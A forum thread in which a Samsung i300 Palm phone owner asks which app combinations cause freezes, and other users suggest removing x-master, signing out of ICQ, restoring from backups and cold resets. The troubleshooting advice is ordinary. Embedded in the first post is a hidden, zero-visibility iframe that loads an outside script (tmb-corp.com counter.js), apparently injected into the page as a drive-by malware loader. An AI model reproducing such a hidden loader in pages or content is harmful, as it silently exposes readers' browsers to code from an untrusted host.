    Program combos

I know this is a tall order but I'm wondering if certain combinations could screw up the phone.

Would it be possible to be more specific when people say they have a lot of programs on the phone and it's working well?

I would like to know what everyone is using that is not crashing the phone. Like what combinations of programs.

I had Astraware PopCap Games Pack (registered) Bugme office and messenger, x-master on my phone when it froze up. The palm portion was fine but the phone would not turn on for a full day. No amount of resets, soft or hard and left the batteries out for a full 24 hours would get it to work. I finally just did soft reset after another, maybe 8 times in a row and it finally came back. It's been fine for maybe 3 hours. I have not synched it up again yet.

I was actually putting the registration in for the fifth and last game when it froze up.

Sprint offered to replace the phone with a refurbished one but I felt like I spent $500 plus accessories for a new one so shouldn't it be replaced with a new one? I don't want someone elses problem phone. Maybe I'm wrong, I don't know.

It did worry me a little that they have so many returns.

Any suggestions or ideas or opionons would be great.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'll tell you programs that I've had major problems with:

Space wars 3.0 - works great on the phone, but if the phone dies and requires a backup, crashes the phone and doesn't allow the restore

ICQ - works fine normally, BUT if you don't sign out after using it (and just switch to another program), it causes resets to freeze

    yeah thats a tall order...

in short, most of the palm programs were not designed for our phone/pda. you will have to do a trial and error approach in installing apps..

but always remember, do a full backup with palm desktop 4.0.1 and you should be fine...

as for the refurb phone... id say you would probably get a new phone.. or maybe a phone that was held back for quiality control reasons and redone... i had to have the equipment replacement program one time for my star tac and i got a brand new one.

My bet would be that x-master is the culprit. I've seen a couple of postings where hacks have caused multiple problems on the I300. Unfortunately, the I300 doesn't work completely like a regular Palm OS handeld. Try deleting x-master and see if your problems still persist.

WOW! You've been busy, that's great. I did sync up last night and left x-master off so I'll see what happens with that. 4.0.1 is definitly the best so far. Although I'm so paranoid about losing all my data that I sync my old visor as well and my cdrw and print it all out once in a while. lol

Another question, when you sync the phone again how do you not install the programs again? What I mean is I want the games and bugme to be installed but not the x-master. When I synced it put everything back in and I had to delete x-master afterward.

As for sprintpcs, I'm one of the few it seems who is much more happy with sprint than not. I have 3 phones and have been with them since early 98. They would not budge on the refurbished phone but did give me a very nice credit.

As with others sprint support could not help with the phone but Samsung support (1-800-samsung) said if I send the phone to them they would replace it with a new one. Since I bought the phone from a sprint store, I thought that is very good of them.

    Thanks all,
    Mark

When you sync, there's a backup copy of all your files made under palm\<yourprofilename>\backup (so for me, c:\palm\mark\backup) - just go in here and delete what you don't want to transfer over.

Another alternative is Pilot Install (pinstall - search for it on any palm site..) I actually use this program in place of palm's for restores.. simply point the program to the backup directory, hit sync, wait about 10-15 minutes (for a full-8mb palm), and you're done...

FYI on my installed programs - only one that gives me problmes is icq.. if I forget to close out ICQ (i.e. switch to another app instead of signing off), then on the next reset it crashes my palm.. simple solution is to reset holding the UP button, delete icq, then reset normally... (...and install icq next time I sync..) - OR as I've been doing lately, just remember to sign out of icq after using it (I believe the same is true w/ aol IM on these phones..)

I have to say I'm very happy with Sprint's network vs. the others (verizon is good as well though..) but so far I've been extremely unhappy with sprint's customer support - I think this is an area where they can definately improve... (but they have so many online tools/etc that using their customer support isn't really necessary...)

x-master is probably not the culprit. it soudns more like a app than x-master.

Hmmm, love this forum, interesting point and thanks for the help.

Some more points/questions; If it's an app causing the problems, phone shutting off by itself is the big pain. I only have Astraware PopCap Games Pack, which I have Bejeweled, Mummy Maze, & Seven Seas plus Ringz, Bubblet, & Traffic. Trial version of Bugme, Bugme Messenger, now x-master again. Handspring Blazer 2, build 49 and that's it as far as I can tell.

Has anyone had any problems with these? I've only seen positive.

Could you tell me what x-master does except give an easy way to access bugme?

    What is ICQ?

And when you need to sign out or it gives problems would that hold true if I sign on to AOL, browse or check e-mail or sign into my Yahoo account, and just go offline or should I sign off first?

I also feel everyones cust. supp. is below par, but I think the tight economy is not helping. Cust. supp. is expensive. Even Dell is pushing people onto their web help.

I'm still learning so hope the questions aren't too simple and are not repeats,
    Thanks again,
    Mark

To add to my last questions, can anyone tell me what app "burkeDB" is? Could this be causing the problems I'm having?

    Thanks for the help,

My list of apps pales in comparison to dionysus , but I am running BugMe Messenger without causing any crashes.

I'd suggest you flush your i300 and add one app at a time, leaving the games off until the end...:
    1) start with a full synch. Just in case, copy your entire Palm folder to another location on your HDD to be safe....
    2) flush your i300 with a cold reset (see http://www.sphi300.com/showthread.php?s=&threadid=550)
    3) reload your i300 with a DIFFERENT username/ profile. This way you start clean. When you synch for the first time, HotSynch will leave your orig config untouched/ saved, and will create a new/ fresh/ clean profile without all of the apps.
    4) Reload each app one at a time onto your i300.

Once you find the problem, do another cold reset, yet install it with your original profile name. Then, make the fix to that orig profile.

That should get you up and going with the least (additional) effort ...
